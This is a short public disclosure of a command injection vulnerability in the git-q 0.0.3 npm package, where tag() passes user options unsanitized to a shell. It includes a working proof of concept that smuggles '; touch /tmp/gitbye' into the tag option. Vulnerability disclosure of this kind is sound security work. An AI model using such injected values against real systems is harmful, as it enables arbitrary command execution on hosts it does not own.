
Command Injection vulnerability in `git-q@0.0.3`

Publicly disclosing a Command Injection vulnerability in the `git-q` npm package, which allows attackers to execute arbitrary commands on the host system via unsanitized user input.

The git-q npm package describes itself as a thin Q promise wrapper for Git commands. Attempts to contact the maintainer via an open issue in the GitHub repository were unfortunately not successful, so this write-up serves as the public disclosure of the vulnerability.


Background on exploitation

I’m reporting a Command Injection vulnerability in the git-q npm package.

This vulnerability manifests in the library’s tag(options) API, which lets user input specify the tag name and a commit message. That input is passed as-is to git: it is concatenated into a single command string that is then handed to a shell, so any shell metacharacters in the options are interpreted as part of the command, making the API vulnerable to command injection.

Exploit

  1. Install git-q@0.0.3
  2. Establish the following POC:

```js
var GitQ = require("git-q");
var gitQ = new GitQ();
gitQ
  .tag({ a: "; touch /tmp/gitbye" })
  .done();
```

  3. Observe the new file created on disk at /tmp/gitbye
